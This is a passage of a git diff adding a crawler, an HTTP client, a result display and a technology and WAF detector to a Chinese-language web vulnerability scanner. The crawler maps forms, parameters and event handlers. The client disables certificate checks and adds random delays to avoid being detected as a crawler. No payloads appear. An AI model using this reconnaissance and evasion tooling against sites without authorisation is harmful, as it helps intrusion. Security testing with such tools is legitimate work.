+{colored('='*80, 'CYAN')}
+{colored('    __  _____ ___     ___                              ', 'CYAN')}
+{colored('    \\ \\/ / __/ __|   / __|__ _ _ _  _ _  ___ _ _      ', 'CYAN')}
+{colored('     >  <\\__ \\__ \\  | (__/ _` | \' \\| \' \\/ -_) \'_|    ', 'CYAN')}
+{colored('    /_/\\_\\___/___/   \\___\\__,_|_||_|_||_\\___|_|       ', 'CYAN')}
+{colored('                                                       ', 'CYAN')}
+{colored('='*80, 'CYAN')}
+{colored('    XSS深度漏洞扫描器 v1.0.0                          ', 'CYAN')}
+{colored('    作者: Lucifrix                           ', 'CYAN')}
+{colored('    支持的漏洞类型: XSS, CSRF, SQL注入, LFI, RFI, SSRF, XXE', 'CYAN')}
+{colored('='*80, 'CYAN')}
+"""
+    print(banner)
+
+def display_progress(current, total, message="正在扫描", width=50):
+    """
+    显示进度条
+    
+    Args:
+        current: 当前进度
+        total: 总进度
+        message: 显示的消息
+        width: 进度条宽度
+    """
+    # 避免除以零
+    if total == 0:
+        total = 1
+        
+    # 计算进度百分比
+    percent = current / total
+    completed = int(width * percent)
+    remaining = width - completed
+    
+    # 构建进度条
+    progress_bar = f"[{colored('#' * completed, 'GREEN')}{' ' * remaining}] {int(percent * 100)}%"
+    
+    # 显示进度条
+    sys.stdout.write(f"\r{message}: {progress_bar}")
+    sys.stdout.flush()
+    
+    # 如果完成，则换行
+    if current == total:
+        sys.stdout.write("\n")
+
+def display_results(results, total_time):
+    """
+    显示扫描结果
+    
+    Args:
+        results: 扫描结果列表
+        total_time: 总耗时
+    """
+    # 合并所有结果的统计信息
+    total_stats = {
+        'pages_scanned': 0,
+        'forms_tested': 0,
+        'parameters_tested': 0,
+        'vulnerabilities_found': 0
+    }
+    
+    all_vulnerabilities = []
+    
+    for result in results:
+        # 更新统计信息
+        for key in total_stats:
+            if key in result['statistics']:
+                total_stats[key] += result['statistics'][key]
+        
+        # 收集所有漏洞
+        all_vulnerabilities.extend(result['vulnerabilities'])
+    
+    # 显示统计信息
+    print(f"\n{colored('='*80, 'CYAN')}")
+    print(f"{colored('扫描统计信息:', 'CYAN')}")
+    print(f"{colored('='*80, 'CYAN')}")
+    print(f"总耗时: {total_time:.2f}秒")
+    print(f"扫描页面数: {total_stats['pages_scanned']}")
+    print(f"测试表单数: {total_stats['forms_tested']}")
+    print(f"测试参数数: {total_stats['parameters_tested']}")
+    print(f"发现漏洞数: {colored(str(total_stats['vulnerabilities_found']), 'RED' if total_stats['vulnerabilities_found'] > 0 else 'GREEN')}")
+    
+    # 如果有漏洞，则显示漏洞详情
+    if all_vulnerabilities:
+        print(f"\n{colored('='*80, 'RED')}")
+        print(f"{colored('漏洞详情:', 'RED')}")
+        print(f"{colored('='*80, 'RED')}")
+        
+        # 按漏洞类型分组
+        vuln_by_type = {}
+        for vuln in all_vulnerabilities:
+            vuln_type = vuln['type']
+            if vuln_type not in vuln_by_type:
+                vuln_by_type[vuln_type] = []
+            vuln_by_type[vuln_type].append(vuln)
+        
+        # 显示各类漏洞详情
+        for vuln_type, vulns in vuln_by_type.items():
+            print(f"\n{colored(f'● {vuln_type} 漏洞 ({len(vulns)}个):', 'YELLOW')}")
+            
+            for i, vuln in enumerate(vulns, 1):
+                print(f"\n  {colored(f'#{i}', 'BOLD')} {colored(vuln['url'], 'UNDERLINE')}")
+                print(f"  - {colored('风险等级:', 'BOLD')} {colored(vuln['severity'], 'RED' if vuln['severity'] == '高' else 'YELLOW' if vuln['severity'] == '中' else 'GREEN')}")
+                print(f"  - {colored('描述:', 'BOLD')} {vuln['description']}")
+                
+                if 'parameter' in vuln:
+                    print(f"  - {colored('参数:', 'BOLD')} {vuln['parameter']}")
+                    
+                if 'payload' in vuln:
+                    print(f"  - {colored('Payload:', 'BOLD')} {vuln['payload']}")
+                    
+                if 'details' in vuln:
+                    print(f"  - {colored('详情:', 'BOLD')} {vuln['details']}")
+                    
+                if 'exploit_result' in vuln:
+                    print(f"  - {colored('利用结果:', 'BOLD')} {vuln['exploit_result']['description']}")
+                    
+                if 'recommendation' in vuln:
+                    print(f"  - {colored('修复建议:', 'BOLD')} {vuln['recommendation']}")
+    else:
+        print(f"\n{colored('='*80, 'GREEN')}")
+        print(f"{colored('恭喜! 未发现漏洞。', 'GREEN')}")
+        print(f"{colored('='*80, 'GREEN')}")
+        
+    print(f"\n{colored('扫描完成!', 'CYAN')}")
+    print(f"{colored('='*80, 'CYAN')}")
+
+def display_vulnerability(vuln):
+    """
+    显示单个漏洞的详细信息
+    
+    Args:
+        vuln: 漏洞信息
+    """
+    print(f"\n{colored('='*80, 'RED')}")
+    print(f"{colored('漏洞详情:', 'RED')}")
+    print(f"{colored('='*80, 'RED')}")
+    
+    print(f"URL: {colored(vuln['url'], 'UNDERLINE')}")
+    print(f"类型: {colored(vuln['type'], 'YELLOW')}")
+    print(f"风险等级: {colored(vuln['severity'], 'RED' if vuln['severity'] == '高' else 'YELLOW' if vuln['severity'] == '中' else 'GREEN')}")
+    print(f"描述: {vuln['description']}")
+    
+    if 'parameter' in vuln:
+        print(f"参数: {vuln['parameter']}")
+        
+    if 'payload' in vuln:
+        print(f"Payload: {vuln['payload']}")
+        
+    if 'details' in vuln:
+        print(f"详情: {vuln['details']}")
+        
+    if 'exploit_result' in vuln:
+        print(f"利用结果: {vuln['exploit_result']['description']}")
+        
+    if 'recommendation' in vuln:
+        print(f"修复建议: {vuln['recommendation']}")
+        
+    print(f"{colored('='*80, 'RED')}")
+
+def prompt_yes_no(message):
+    """
+    提示用户输入是/否
+    
+    Args:
+        message: 提示消息
+        
+    Returns:
+        bool: 用户选择是返回True，否返回False
+    """
+    valid_responses = {
+        'y': True, 'yes': True, '是': True, 
+        'n': False, 'no': False, '否': False
+    }
+    
+    while True:
+        response = input(f"{message} (y/n): ").lower()
+        if response in valid_responses:
+            return valid_responses[response]
+        print("请输入 'y' 或 'n'")
+
+def prompt_input(message, default=None):
+    """
+    提示用户输入
+    
+    Args:
+        message: 提示消息
+        default: 默认值
+        
+    Returns:
+        str: 用户输入
+    """
+    if default:
+        prompt = f"{message} [{default}]: "
+    else:
+        prompt = f"{message}: "
+        
+    response = input(prompt)
+    
+    # 如果用户没有输入，则使用默认值
+    if not response and default is not None:
+        return default
+        
+    return response 
\ No newline at end of file
diff --git a/xss_scanner/utils/__pycache__/crawler.cpython-313.pyc b/xss_scanner/utils/__pycache__/crawler.cpython-313.pyc
new file mode 100644
index 0000000..afe3a46
Binary files /dev/null and b/xss_scanner/utils/__pycache__/crawler.cpython-313.pyc differ
diff --git a/xss_scanner/utils/__pycache__/http_client.cpython-313.pyc b/xss_scanner/utils/__pycache__/http_client.cpython-313.pyc
new file mode 100644
index 0000000..d35cf00
Binary files /dev/null and b/xss_scanner/utils/__pycache__/http_client.cpython-313.pyc differ
diff --git a/xss_scanner/utils/__pycache__/tech_detector.cpython-313.pyc b/xss_scanner/utils/__pycache__/tech_detector.cpython-313.pyc
new file mode 100644
index 0000000..a00e278
Binary files /dev/null and b/xss_scanner/utils/__pycache__/tech_detector.cpython-313.pyc differ
diff --git a/xss_scanner/utils/__pycache__/validator.cpython-313.pyc b/xss_scanner/utils/__pycache__/validator.cpython-313.pyc
new file mode 100644
index 0000000..1505ad0
Binary files /dev/null and b/xss_scanner/utils/__pycache__/validator.cpython-313.pyc differ
diff --git a/xss_scanner/utils/crawler.py b/xss_scanner/utils/crawler.py
new file mode 100644
index 0000000..1dda4c6
--- /dev/null
+++ b/xss_scanner/utils/crawler.py
@@ -0,0 +1,398 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+爬虫模块，负责爬取目标网站的页面
+"""
+
+import re
+import logging
+import threading
+import queue
+import time
+from urllib.parse import urlparse, urljoin, parse_qsl
+from bs4 import BeautifulSoup
+from concurrent.futures import ThreadPoolExecutor
+
+logger = logging.getLogger('xss_scanner')
+
+class Crawler:
+    """爬虫类，负责爬取网站页面"""
+    
+    def __init__(self, http_client, max_depth=2, threads=5, exclude_pattern=None, include_pattern=None):
+        """
+        初始化爬虫
+        
+        Args:
+            http_client: HTTP客户端
+            max_depth: 最大爬取深度
+            threads: 线程数
+            exclude_pattern: 排除URL模式
+            include_pattern: 包含URL模式
+        """
+        self.http_client = http_client
+        self.max_depth = max_depth
+        self.threads = threads
+        self.exclude_pattern = exclude_pattern
+        self.include_pattern = include_pattern
+        
+        # 已访问的URL
+        self.visited_urls = set()
+        
+        # 待访问的URL队列
+        self.url_queue = queue.Queue()
+        
+        # 存储爬取结果
+        self.results = []
+        
+        # 线程锁
+        self.lock = threading.Lock()
+        
+        # 线程池
+        self.thread_pool = None
+        
+        # 记录每个页面的加载状态
+        self.page_status = {}
+        
+        # 常见的静态资源文件扩展名
+        self.static_extensions = {
+            '.css', '.js', '.jpg', '.jpeg', '.png', '.gif', '.svg', '.ico', '.pdf', 
+            '.doc', '.docx', '.xls', '.xlsx', '.ppt', '.pptx', '.zip', '.rar', '.tar', 
+            '.gz', '.mp3', '.mp4', '.avi', '.mov', '.flv', '.wmv'
+        }
+    
+    def crawl(self, base_url):
+        """
+        爬取指定的网站
+        
+        Args:
+            base_url: 基础URL
+            
+        Returns:
+            list: 爬取结果，包含页面信息
+        """
+        logger.info(f"开始爬取网站: {base_url}")
+        
+        # 重置状态
+        self.visited_urls = set()
+        self.url_queue = queue.Queue()
+        self.results = []
+        self.page_status = {}
+        
+        # 解析基础URL
+        parsed_base_url = urlparse(base_url)
+        self.base_domain = parsed_base_url.netloc
+        
+        # 添加基础URL到队列
+        self.url_queue.put((base_url, 0))  # (url, depth)
+        
+        # 创建线程池
+        self.thread_pool = ThreadPoolExecutor(max_workers=self.threads)
+        
+        # 创建并启动爬虫线程
+        workers = []
+        for _ in range(self.threads):
+            worker = threading.Thread(target=self._worker)
+            workers.append(worker)
+            worker.start()
+        
+        # 等待所有线程完成
+        for worker in workers:
+            worker.join()
+        
+        logger.info(f"爬取完成，共发现 {len(self.results)} 个页面")
+        
+        return self.results
+    
+    def _worker(self):
+        """爬虫工作线程"""
+        while True:
+            try:
+                # 获取URL和深度
+                url, depth = self.url_queue.get(block=False)
+                
+                # 处理URL
+                self._process_url(url, depth)
+                
+                # 标记任务完成
+                self.url_queue.task_done()
+            except queue.Empty:
+                # 队列为空，检查是否所有线程都空闲
+                with self.lock:
+                    if self.url_queue.empty():
+                        break
+            except Exception as e:
+                logger.error(f"爬虫线程错误: {str(e)}")
+    
+    def _process_url(self, url, depth):
+        """
+        处理URL
+        
+        Args:
+            url: 要处理的URL
+            depth: 当前深度
+        """
+        # 如果超过最大深度，则跳过
+        if depth > self.max_depth:
+            return
+            
+        # 如果URL已访问，则跳过
+        if url in self.visited_urls:
+            return
+            
+        # 添加到已访问集合
+        with self.lock:
+            self.visited_urls.add(url)
+        
+        # 检查URL是否符合过滤条件
+        if not self._should_crawl(url):
+            return
+            
+        logger.debug(f"爬取页面: {url}")
+        
+        # 发送HTTP请求
+        response = self.http_client.get(url)
+        if not response or response.status_code != 200:
+            logger.debug(f"页面获取失败: {url}, 状态码: {response.status_code if response else 'None'}")
+            return
+            
+        # 解析页面内容
+        content_type = response.headers.get('Content-Type', '')
+        if 'text/html' not in content_type:
+            logger.debug(f"跳过非HTML页面: {url}, Content-Type: {content_type}")
+            return
+            
+        # 解析HTML
+        soup = BeautifulSoup(response.text, 'html.parser')
+        
+        # 提取页面信息
+        page_info = self._extract_page_info(url, soup, response)
+        
+        # 添加到结果
+        with self.lock:
+            self.results.append(page_info)
+        
+        # 如果未达到最大深度，则提取链接
+        if depth < self.max_depth:
+            links = self._extract_links(url, soup)
+            for link in links:
+                # 添加到队列
+                self.url_queue.put((link, depth + 1))
+    
+    def _extract_page_info(self, url, soup, response):
+        """
+        提取页面信息
+        
+        Args:
+            url: 页面URL
+            soup: BeautifulSoup对象
+            response: 响应对象
+            
+        Returns:
+            dict: 页面信息
+        """
+        # 提取页面标题
+        title = soup.title.string if soup.title else "No Title"
+        
+        # 提取表单
+        forms = self._extract_forms(url, soup)
+        
+        # 提取URL参数
+        params = self._extract_params(url)
+        
+        # 提取JavaScript事件
+        events = self._extract_js_events(soup)
+        
+        # 提取HTTP头
+        headers = dict(response.headers)
+        
+        return {
+            'url': url,
+            'title': title,
+            'forms': forms,
+            'params': params,
+            'events': events,
+            'headers': headers,
+            'status_code': response.status_code,
+            'content_length': len(response.content),
+            'cookies': dict(response.cookies)
+        }
+    
+    def _extract_links(self, base_url, soup):
+        """
+        提取页面中的链接
+        
+        Args:
+            base_url: 基础URL
+            soup: BeautifulSoup对象
+            
+        Returns:
+            list: 提取的链接列表
+        """
+        links = []
+        
+        # 提取<a>标签链接
+        for a in soup.find_all('a', href=True):
+            link = a['href'].strip()
+            if link:
+                full_url = urljoin(base_url, link)
+                links.append(full_url)
+        
+        # 提取<form>标签链接
+        for form in soup.find_all('form', action=True):
+            link = form['action'].strip()
+            if link:
+                full_url = urljoin(base_url, link)
+                links.append(full_url)
+        
+        # 过滤链接
+        filtered_links = []
+        for link in links:
+            # 跳过锚点链接
+            if '#' in link:
+                link = link.split('#')[0]
+                if not link:
+                    continue
+            
+            # 跳过JavaScript链接
+            if link.startswith('javascript:'):
+                continue
+                
+            # 跳过邮件链接
+            if link.startswith('mailto:'):
+                continue
+                
+            # 跳过电话链接
+            if link.startswith('tel:'):
+                continue
+                
+            # 跳过静态资源文件
+            parsed_link = urlparse(link)
+            path = parsed_link.path.lower()
+            if any(path.endswith(ext) for ext in self.static_extensions):
+                continue
+                
+            # 只爬取同一域名
+            if parsed_link.netloc and parsed_link.netloc != self.base_domain:
+                continue
+                
+            filtered_links.append(link)
+        
+        return list(set(filtered_links))
+    
+    def _extract_forms(self, base_url, soup):
+        """
+        提取页面中的表单
+        
+        Args:
+            base_url: 基础URL
+            soup: BeautifulSoup对象
+            
+        Returns:
+            list: 表单列表
+        """
+        forms = []
+        
+        for form in soup.find_all('form'):
+            form_info = {
+                'id': form.get('id', ''),
+                'name': form.get('name', ''),
+                'method': form.get('method', 'get').upper(),
+                'action': urljoin(base_url, form.get('action', '')),
+                'fields': []
+            }
+            
+            # 提取表单字段
+            for field in form.find_all(['input', 'textarea', 'select']):
+                # 跳过隐藏字段
+                if field.name == 'input' and field.get('type') == 'hidden':
+                    continue
+                    
+                field_info = {
+                    'name': field.get('name', ''),
+                    'id': field.get('id', ''),
+                    'type': field.get('type', 'text') if field.name == 'input' else field.name,
+                    'value': field.get('value', '')
+                }
+                
+                form_info['fields'].append(field_info)
+                
+            forms.append(form_info)
+            
+        return forms
+    
+    def _extract_params(self, url):
+        """
+        提取URL参数
+        
+        Args:
+            url: URL
+            
+        Returns:
+            list: 参数列表
+        """
+        parsed_url = urlparse(url)
+        params = [p[0] for p in parse_qsl(parsed_url.query)]
+        return params
+    
+    def _extract_js_events(self, soup):
+        """
+        提取JavaScript事件
+        
+        Args:
+            soup: BeautifulSoup对象
+            
+        Returns:
+            list: 事件列表
+        """
+        events = []
+        
+        # 常见的JavaScript事件属性
+        js_events = [
+            'onclick', 'onmouseover', 'onmouseout', 'onload', 'onerror', 'onsubmit',
+            'onchange', 'onkeyup', 'onkeydown', 'onkeypress', 'onblur', 'onfocus',
+            'onreset', 'onselect', 'onabort', 'ondblclick', 'onmousedown', 'onmouseup',
+            'onmousemove', 'onunload'
+        ]
+        
+        # 查找所有带有JavaScript事件的标签
+        for tag in soup.find_all():
+            for event in js_events:
+                if tag.has_attr(event):
+                    events.append({
+                        'tag': tag.name,
+                        'event': event,
+                        'code': tag[event]
+                    })
+                    
+        return events
+    
+    def _should_crawl(self, url):
+        """
+        检查URL是否应该爬取
+        
+        Args:
+            url: URL
+            
+        Returns:
+            bool: 是否应该爬取
+        """
+        # 检查是否是HTTP或HTTPS协议
+        if not url.startswith(('http://', 'https://')):
+            return False
+            
+        # 检查排除模式
+        if self.exclude_pattern and re.search(self.exclude_pattern, url):
+            return False
+            
+        # 检查包含模式
+        if self.include_pattern and not re.search(self.include_pattern, url):
+            return False
+            
+        # 检查是否是静态资源文件
+        parsed_url = urlparse(url)
+        path = parsed_url.path.lower()
+        if any(path.endswith(ext) for ext in self.static_extensions):
+            return False
+            
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/utils/http_client.py b/xss_scanner/utils/http_client.py
new file mode 100644
index 0000000..e2f1f77
--- /dev/null
+++ b/xss_scanner/utils/http_client.py
@@ -0,0 +1,315 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+HTTP客户端模块，负责发送HTTP请求
+"""
+
+import logging
+import requests
+import random
+import time
+from urllib.parse import urlparse, urljoin
+from requests.exceptions import RequestException, Timeout, ConnectionError
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+# 禁用不安全请求的警告
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+logger = logging.getLogger('xss_scanner')
+
+class HttpClient:
+    """HTTP客户端类，负责处理HTTP请求"""
+    
+    def __init__(self, timeout=10, user_agent=None, proxy=None, cookies=None, headers=None, verify_ssl=False):
+        """
+        初始化HTTP客户端
+        
+        Args:
+            timeout: 请求超时时间
+            user_agent: 用户代理
+            proxy: 代理
+            cookies: Cookies
+            headers: 自定义HTTP头
+            verify_ssl: 是否验证SSL证书
+        """
+        self.timeout = timeout
+        self.user_agent = user_agent
+        self.proxy = proxy
+        self.cookies = cookies or {}
+        self.headers = headers or {}
+        self.verify_ssl = verify_ssl
+        self.session = requests.Session()
+        
+        # 设置默认User-Agent
+        if not self.user_agent:
+            self.user_agent = (
+                "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
+                "AppleWebKit/537.36 (KHTML, like Gecko) "
+                "Chrome/91.0.4472.124 Safari/537.36"
+            )
+            
+        # 设置默认请求头
+        if 'User-Agent' not in self.headers:
+            self.headers['User-Agent'] = self.user_agent
+            
+    def get(self, url, params=None, headers=None, cookies=None, allow_redirects=True, timeout=None):
+        """
+        发送GET请求
+        
+        Args:
+            url: 请求的URL
+            params: 请求参数
+            headers: 请求头
+            cookies: Cookies
+            allow_redirects: 是否允许重定向
+            timeout: 超时时间
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        merged_headers = self._merge_headers(headers)
+        merged_cookies = self._merge_cookies(cookies)
+        timeout = timeout or self.timeout
+        
+        try:
+            response = self.session.get(
+                url=url,
+                params=params,
+                headers=merged_headers,
+                cookies=merged_cookies,
+                proxies=self._get_proxies(),
+                allow_redirects=allow_redirects,
+                timeout=timeout,
+                verify=self.verify_ssl
+            )
+            return response
+        except Timeout:
+            logger.warning(f"请求超时: {url}")
+        except ConnectionError:
+            logger.warning(f"连接错误: {url}")
+        except RequestException as e:
+            logger.warning(f"请求异常: {url} - {str(e)}")
+        except Exception as e:
+            logger.error(f"发送GET请求时发生错误: {url} - {str(e)}")
+            
+        return None
+        
+    def post(self, url, data=None, json=None, headers=None, cookies=None, allow_redirects=True, timeout=None):
+        """
+        发送POST请求
+        
+        Args:
+            url: 请求的URL
+            data: 表单数据
+            json: JSON数据
+            headers: 请求头
+            cookies: Cookies
+            allow_redirects: 是否允许重定向
+            timeout: 超时时间
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        merged_headers = self._merge_headers(headers)
+        merged_cookies = self._merge_cookies(cookies)
+        timeout = timeout or self.timeout
+        
+        try:
+            response = self.session.post(
+                url=url,
+                data=data,
+                json=json,
+                headers=merged_headers,
+                cookies=merged_cookies,
+                proxies=self._get_proxies(),
+                allow_redirects=allow_redirects,
+                timeout=timeout,
+                verify=self.verify_ssl
+            )
+            return response
+        except Timeout:
+            logger.warning(f"请求超时: {url}")
+        except ConnectionError:
+            logger.warning(f"连接错误: {url}")
+        except RequestException as e:
+            logger.warning(f"请求异常: {url} - {str(e)}")
+        except Exception as e:
+            logger.error(f"发送POST请求时发生错误: {url} - {str(e)}")
+            
+        return None
+        
+    def head(self, url, headers=None, cookies=None, allow_redirects=True, timeout=None):
+        """
+        发送HEAD请求
+        
+        Args:
+            url: 请求的URL
+            headers: 请求头
+            cookies: Cookies
+            allow_redirects: 是否允许重定向
+            timeout: 超时时间
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        merged_headers = self._merge_headers(headers)
+        merged_cookies = self._merge_cookies(cookies)
+        timeout = timeout or self.timeout
+        
+        try:
+            response = self.session.head(
+                url=url,
+                headers=merged_headers,
+                cookies=merged_cookies,
+                proxies=self._get_proxies(),
+                allow_redirects=allow_redirects,
+                timeout=timeout,
+                verify=self.verify_ssl
+            )
+            return response
+        except Exception as e:
+            logger.error(f"发送HEAD请求时发生错误: {url} - {str(e)}")
+            
+        return None
+        
+    def request(self, method, url, **kwargs):
+        """
+        发送自定义请求
+        
+        Args:
+            method: 请求方法
+            url: 请求的URL
+            **kwargs: 其他参数
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        # 合并请求头和Cookies
+        if 'headers' in kwargs:
+            kwargs['headers'] = self._merge_headers(kwargs['headers'])
+        else:
+            kwargs['headers'] = self._merge_headers({})
+            
+        if 'cookies' in kwargs:
+            kwargs['cookies'] = self._merge_cookies(kwargs['cookies'])
+        else:
+            kwargs['cookies'] = self._merge_cookies({})
+            
+        # 设置代理
+        kwargs['proxies'] = self._get_proxies()
+        
+        # 设置默认参数
+        kwargs.setdefault('timeout', self.timeout)
+        kwargs.setdefault('verify', self.verify_ssl)
+        
+        try:
+            response = self.session.request(method, url, **kwargs)
+            return response
+        except Exception as e:
+            logger.error(f"发送{method}请求时发生错误: {url} - {str(e)}")
+            
+        return None
+        
+    def download_file(self, url, save_path, chunk_size=8192):
+        """
+        下载文件
+        
+        Args:
+            url: 文件URL
+            save_path: 保存路径
+            chunk_size: 块大小
+            
+        Returns:
+            bool: 下载是否成功
+        """
+        try:
+            response = self.get(url, stream=True)
+            if not response or response.status_code != 200:
+                logger.error(f"下载文件失败, 状态码: {response.status_code if response else 'None'}")
+                return False
+                
+            with open(save_path, 'wb') as f:
+                for chunk in response.iter_content(chunk_size=chunk_size):
+                    if chunk:
+                        f.write(chunk)
+                        
+            return True
+        except Exception as e:
+            logger.error(f"下载文件时发生错误: {url} - {str(e)}")
+            return False
+            
+    def submit_form(self, url, form_data, method='POST', headers=None, cookies=None):
+        """
+        提交表单
+        
+        Args:
+            url: 表单提交URL
+            form_data: 表单数据
+            method: 提交方法
+            headers: 请求头
+            cookies: Cookies
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        if method.upper() == 'POST':
+            return self.post(url, data=form_data, headers=headers, cookies=cookies)
+        else:
+            return self.get(url, params=form_data, headers=headers, cookies=cookies)
+            
+    def _merge_headers(self, headers=None):
+        """
+        合并请求头
+        
+        Args:
+            headers: 请求头
+            
+        Returns:
+            dict: 合并后的请求头
+        """
+        merged = self.headers.copy()
+        if headers:
+            merged.update(headers)
+        return merged
+        
+    def _merge_cookies(self, cookies=None):
+        """
+        合并Cookies
+        
+        Args:
+            cookies: Cookies
+            
+        Returns:
+            dict: 合并后的Cookies
+        """
+        merged = self.cookies.copy()
+        if cookies:
+            merged.update(cookies)
+        return merged
+        
+    def _get_proxies(self):
+        """
+        获取代理配置
+        
+        Returns:
+            dict: 代理配置
+        """
+        if not self.proxy:
+            return {}
+            
+        return {
+            'http': self.proxy,
+            'https': self.proxy
+        }
+        
+    def delay_request(self, min_delay=1, max_delay=3):
+        """
+        延迟请求以避免被目标网站检测为爬虫
+        
+        Args:
+            min_delay: 最小延迟时间(秒)
+            max_delay: 最大延迟时间(秒)
+        """
+        delay = random.uniform(min_delay, max_delay)
+        time.sleep(delay) 
\ No newline at end of file
diff --git a/xss_scanner/utils/tech_detector.py b/xss_scanner/utils/tech_detector.py
new file mode 100644
index 0000000..d35d723
--- /dev/null
+++ b/xss_scanner/utils/tech_detector.py
@@ -0,0 +1,384 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+技术检测模块，用于识别网页使用的技术、框架和编程语言
+"""
+
+import re
+import logging
+import json
+from urllib.parse import urlparse
+from bs4 import BeautifulSoup
+
+logger = logging.getLogger('xss_scanner')
+
+class TechDetector:
+    """网站技术检测类，用于识别网站使用的技术栈"""
+    
+    def __init__(self):
+        """初始化技术检测器"""
+        # 前端框架特征
+        self.frontend_frameworks = {
+            'React': [
+                ('script', {'src': re.compile(r'react(-|\.min\.)?\.js')}),
+                ('script', {'src': re.compile(r'react-dom(-|\.min\.)?\.js')}),
+                ('meta', {'name': 'generator', 'content': re.compile(r'react', re.I)}),
+                ('div', {'id': 'root'}),
+                ('div', {'id': 'app'}),
+                ('meta', {'name': 'next-head-count'}),
+                ('code', {'id': '__NEXT_DATA__'})
+            ],
+            'Vue.js': [
+                ('script', {'src': re.compile(r'vue(-|\.min\.)?\.js')}),
+                ('div', {'id': 'app'}),
+                ('div', {'id': 'vue-app'}),
+                ('div', {'class': 'v-application'}),
+                ('meta', {'name': 'generator', 'content': re.compile(r'vue', re.I)})
+            ],
+            'Angular': [
+                ('script', {'src': re.compile(r'angular(-|\.min\.)?\.js')}),
+                ('*', {'ng-app': re.compile(r'.*')}),
+                ('*', {'ng-controller': re.compile(r'.*')}),
+                ('*', {'ng-repeat': re.compile(r'.*')}),
+                ('*', {'ng-bind': re.compile(r'.*')}),
+                ('*', {'ng-model': re.compile(r'.*')})
+            ],
+            'jQuery': [
+                ('script', {'src': re.compile(r'jquery(-|\.min\.)?\.js')}),
+            ],
+            'Bootstrap': [
+                ('link', {'href': re.compile(r'bootstrap(-|\.min\.)?\.css')}),
+                ('script', {'src': re.compile(r'bootstrap(-|\.min\.)?\.js')}),
+                ('div', {'class': re.compile(r'container(-fluid)?')}),
+                ('div', {'class': re.compile(r'row')}),
+                ('div', {'class': re.compile(r'col(-[a-z]+-[0-9]+)?')})
+            ]
+        }
+        
+        # 后端框架和语言特征
+        self.backend_technologies = {
+            'PHP': [
+                ('X-Powered-By', re.compile(r'PHP/?', re.I)),
+                ('Set-Cookie', re.compile(r'PHPSESSID', re.I)),
+                ('link', {'href': re.compile(r'\.php')}),
+                ('a', {'href': re.compile(r'\.php')}),
+                ('form', {'action': re.compile(r'\.php')})
+            ],
+            'WordPress': [
+                ('meta', {'name': 'generator', 'content': re.compile(r'WordPress', re.I)}),
+                ('link', {'href': re.compile(r'wp-content')}),
+                ('script', {'src': re.compile(r'wp-includes')}),
+                ('link', {'rel': 'https://api.w.org/'}),
+                ('meta', {'property': 'og:site_name'}),
+                ('body', {'class': re.compile(r'wordpress')})
+            ],
+            'Laravel': [
+                ('input', {'name': '_token'}),
+                ('meta', {'name': 'csrf-token'}),
+                ('script', {'src': re.compile(r'vendor/laravel')}),
+                ('Set-Cookie', re.compile(r'laravel_session', re.I))
+            ],
+            'Django': [
+                ('input', {'name': 'csrfmiddlewaretoken'}),
+                ('meta', {'name': 'csrf-token'}),
+                ('X-Frame-Options', 'SAMEORIGIN')
+            ],
+            'Flask': [
+                ('form', {'action': re.compile(r'\/[a-z0-9_]+\/?')}),
+                ('Set-Cookie', re.compile(r'session=', re.I))
+            ],
+            'Python': [
+                ('Server', re.compile(r'(Python|Werkzeug|Django|Tornado|Flask|CherryPy)', re.I)),
+                ('X-Powered-By', re.compile(r'(Python|Werkzeug|Django|Tornado|Flask|CherryPy)', re.I))
+            ],
+            'ASP.NET': [
+                ('X-Powered-By', re.compile(r'ASP\.NET', re.I)),
+                ('X-AspNet-Version', re.compile(r'.*')),
+                ('Set-Cookie', re.compile(r'ASP\.NET_SessionId', re.I)),
+                ('form', {'action': re.compile(r'\.aspx')}),
+                ('input', {'name': '__VIEWSTATE'})
+            ],
+            'Node.js': [
+                ('X-Powered-By', re.compile(r'Express', re.I)),
+                ('Set-Cookie', re.compile(r'connect\.sid', re.I))
+            ],
+            'Ruby on Rails': [
+                ('X-Powered-By', re.compile(r'Phusion Passenger|Ruby|Rails', re.I)),
+                ('Set-Cookie', re.compile(r'_session_id', re.I)),
+                ('meta', {'name': 'csrf-param', 'content': 'authenticity_token'})
+            ],
+            'Java': [
+                ('X-Powered-By', re.compile(r'(JSP|Servlet|Tomcat|JBoss|GlassFish|WebLogic|WebSphere|Jetty)', re.I)),
+                ('Server', re.compile(r'(Tomcat|JBoss|GlassFish|WebLogic|WebSphere|Jetty)', re.I)),
+                ('Set-Cookie', re.compile(r'JSESSIONID', re.I))
+            ],
+            'Go': [
+                ('Server', re.compile(r'(go httpserver)', re.I)),
+                ('X-Powered-By', re.compile(r'(go|gin|echo)', re.I))
+            ]
+        }
+        
+        # 服务器特征
+        self.server_technologies = {
+            'Nginx': [
+                ('Server', re.compile(r'nginx', re.I))
+            ],
+            'Apache': [
+                ('Server', re.compile(r'apache', re.I))
+            ],
+            'IIS': [
+                ('Server', re.compile(r'IIS', re.I))
+            ],
+            'LiteSpeed': [
+                ('Server', re.compile(r'LiteSpeed', re.I))
+            ],
+            'Cloudflare': [
+                ('Server', re.compile(r'cloudflare', re.I)),
+                ('CF-RAY', re.compile(r'.*')),
+                ('CF-Cache-Status', re.compile(r'.*'))
+            ],
+            'Varnish': [
+                ('X-Varnish', re.compile(r'.*')),
+                ('X-Varnish-Cache', re.compile(r'.*'))
+            ]
+        }
+        
+        # WAF特征
+        self.waf_technologies = {
+            'Cloudflare': [
+                ('Server', re.compile(r'cloudflare', re.I)),
+                ('CF-RAY', re.compile(r'.*'))
+            ],
+            'ModSecurity': [
+                ('Server', re.compile(r'mod_security', re.I)),
+                ('X-Mod-Security', re.compile(r'.*'))
+            ],
+            'Sucuri': [
+                ('X-Sucuri-ID', re.compile(r'.*')),
+                ('X-Sucuri-Cache', re.compile(r'.*'))
+            ],
+            'Imperva': [
+                ('X-Iinfo', re.compile(r'.*')),
